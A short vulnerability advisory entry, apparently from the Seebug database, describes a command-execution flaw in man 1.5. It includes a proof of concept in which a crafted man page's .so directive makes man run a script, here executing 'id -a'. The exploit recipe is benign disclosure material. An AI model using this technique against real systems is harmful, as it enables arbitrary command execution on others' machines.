Man Program 1.5 Unsafe Return Value Command Execution Vulnerability

ID SSV:76149
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00


No description provided by source.


It has been reported that the man program does not properly handle some types of input. When a man page is processed that could pose a potential security risk, the program reacts in a way that may open a window of opportunity for an attacker to execute arbitrary commands.

$ cat innocent.1
.so "".1
$ cat '"".1' # the outer '' quotes are for the shell
the user will never see this
$ cat `which unsafe`

echo "oops"
id -a
$ man ./innocent.1
uid=528(lloyd) gid=100(users) groups=100(users)